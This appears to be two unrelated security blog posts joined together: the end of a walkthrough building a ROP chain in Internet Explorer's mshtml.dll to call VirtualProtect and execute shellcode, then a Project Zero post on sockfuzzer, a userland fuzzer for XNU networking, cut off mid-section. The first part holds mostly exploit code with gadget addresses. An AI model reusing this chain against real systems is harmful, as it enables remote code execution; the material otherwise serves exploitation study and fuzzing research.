Since the address of the return address placeholder is in EAX, we can simply add the value of EBX to it, which is the distance from the return address placeholder, to EAX, which will result in the stack address that points to the beginning of our shellcode into EAX. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address pointing to the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location 4 bytes, so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProcect parameter. Instead of the negative value of 0x401 this time, we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";             // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to to just overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contain NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";             // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECDX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\uCCCC\uCCCC";
}

After ECX is incremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which then is exchanged with ESP to load the function call into ESP! The, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long winded blog post. It has been a bit disheartening to see a lack of beginning to end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping those out who want to get into it, but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Designing sockfuzzer, a network syscall fuzzer for XNU

By: Ryan
22 April 2021 at 18:05

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects –  with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_proto was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling
ip_input.

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:

project(libxnu)

set(XNU_DEFINES

    -DAPPLE

    -DKERNEL

    # ...

)

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    bsd/net/if.c

    bsd/netinet/ip_input.c

    # ...

)

add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:

      _if_clone_detach in libxnu.a(if.c.o)

  "_zfree", referenced from:

      _kqueue_destroy in libxnu.a(kern_event.c.o)

      _knote_free in libxnu.a(kern_event.c.o)

      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)

      _kev_delete in libxnu.a(kern_event.c.o)

      _pipepair_alloc in libxnu.a(sys_pipe.c.o)

      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)

      _so_cache_timer in libxnu.a(uipc_socket.c.o)

      ...

  "_zinit", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _pipeinit in libxnu.a(sys_pipe.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _unp_init in libxnu.a(uipc_usrreq.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      ...

  "_zone_change", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      _ifa_init in libxnu.a(if.c.o)

      _if_clone_attach in libxnu.a(if.c.o)

      ...

ld: symbol(s) not found for architecture x86_64

clang: error: linker command failed with exit code 1 (use -v to see invocation)

ninja: build stopped: subcommand failed.


To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation
void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal can be achieved with linker flags, but it was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#include <kern/assert.h>

#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {

  printf("%s: assert failed on line %d: %s\n", file, line, expression);

  __builtin_trap();

}

void IOBSDGetPlatformUUID() { assert(false); }

void IOMapperInsertPage() { assert(false); }

// ...


Then we just link this file into the XNU library we’re building by adding it to the source list:

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    # ...

    fuzz/syscall_wrappers.c

    fuzz/ioctl.c

    fuzz/backend.c

    fuzz/stubs.c

    fuzz/fake_impls.c


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in
libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,

                                                          socklen_t* anamelen,

                                                          int* retval) {

  struct accept_args uap = {

      .s = s,

      .name = name,

      .anamelen = anamelen,

  };

  return accept(kernproc, &uap, retval);

}

Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called generate_fuzzer.py using syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer

                       PRIVATE -g

                               -std=c++11

                               -Werror

                               -Wno-address-of-packed-member

                               ${FUZZER_CXX_FLAGS})

if(APPLE)

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})

else()

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)

endif(APPLE)

Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {

  required Domain domain = 1;

  required SoType so_type = 2;

  required Protocol protocol = 3;

  // TODO: options, e.g. SO_ACCEPTCONN

}

message Close {

  required FileDescriptor fd = 1;

}

message SetSocketOpt {

  optional Protocol level = 1;

  optional SocketOptName name = 2;

  // TODO(nedwill): structure for val

  optional bytes val = 3;

  optional FileDescriptor fd = 4;

}

message Command {

  oneof command {

    Packet ip_input = 1;

    SetSocketOpt set_sock_opt = 2;

    Socket socket = 3;

    Close close = 4;

  }

}

message Session {

  repeated Command commands = 1;

  required bytes data_provider = 2;

}

I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of “commands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a “Socket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one “Session” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(const Session &session) {

// ...

  std::set<int> open_fds;

  for (const Command &command : session.commands()) {

    int retval = 0;

    switch (command.command_case()) {

      case Command::kSocket: {

        int fd = 0;

        int err = socket_wrapper(command.socket().domain(),

                                 command.socket().so_type(),

                                 command.socket().protocol(), &fd);

        if (err == 0) {

          // Make sure we're tracking fds properly.

          if (open_fds.find(fd) != open_fds.end()) {

            printf("Found existing fd %d\n", fd);

            assert(false);

          }

          open_fds.insert(fd);

        }

        break;

      }

      case Command::kClose: {

        open_fds.erase(command.close().fd());

        close_wrapper(command.close().fd(), nullptr);

        break;

      }

      case Command::kSetSockOpt: {

        int s = command.set_sock_opt().fd();

        int level = command.set_sock_opt().level();

        int name = command.set_sock_opt().name();

        size_t size = command.set_sock_opt().val().size();

        std::unique_ptr<char[]> val(new char[size]);

        memcpy(val.get(), command.set_sock_opt().val().data(), size);

        setsockopt_wrapper(s, level, name, val.get(), size, nullptr);

        break;

      }

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP:

message Packet {

  oneof packet {

    TcpPacket tcp_packet = 1;

  }

}

message TcpPacket {

  required IpHdr ip_hdr = 1;

  required TcpHdr tcp_hdr = 2;

  optional bytes data = 3;

}

message IpHdr {

  required uint32 ip_hl = 1;

  required IpVersion ip_v = 2;

  required uint32 ip_tos = 3;

  required uint32 ip_len = 4;

  required uint32 ip_id = 5;

  required uint32 ip_off = 6;

  required uint32 ip_ttl = 7;

  required Protocol ip_p = 8;

  required InAddr ip_src = 9;

  required InAddr ip_dst = 10;

}

message TcpHdr {

  required Port th_sport = 1;

  required Port th_dport = 2;

  required TcpSeq th_seq = 3;

  required TcpSeq th_ack = 4;

  required uint32 th_off = 5;

  repeated TcpFlag th_flags = 6;

  required uint32 th_win = 7;

  required uint32 th_sum = 8;

  required uint32 th_urp = 9;

  // Ned's extensions

  required bool is_pure_syn = 10;

  required bool is_pure_ack = 11;

}

Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::string get_tcp_hdr(const TcpHdr &hdr) {

  struct tcphdr tcphdr = {

      .th_sport = (unsigned short)hdr.th_sport(),

      .th_dport = (unsigned short)hdr.th_dport(),

      .th_seq = __builtin_bswap32(hdr.th_seq()),

      .th_ack = __builtin_bswap32(hdr.th_ack()),

      .th_off = hdr.th_off(),

      .th_flags = 0,

      .th_win = (unsigned short)hdr.th_win(),

      .th_sum = 0, // TODO(nedwill): calculate the checksum instead of skipping it

      .th_urp = (unsigned short)hdr.th_urp(),

  };

  for (const int flag : hdr.th_flags()) {

    tcphdr.th_flags ^= flag;

  }

  // Prefer pure syn

  if (hdr.is_pure_syn()) {

    tcphdr.th_flags &= ~(TH_RST | TH_ACK);

    tcphdr.th_flags |= TH_SYN;

  } else if (hdr.is_pure_ack()) {

    tcphdr.th_flags &= ~(TH_RST | TH_SYN);

    tcphdr.th_flags |= TH_ACK;

  }

  std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr));

  return dat;

}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation.

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used.

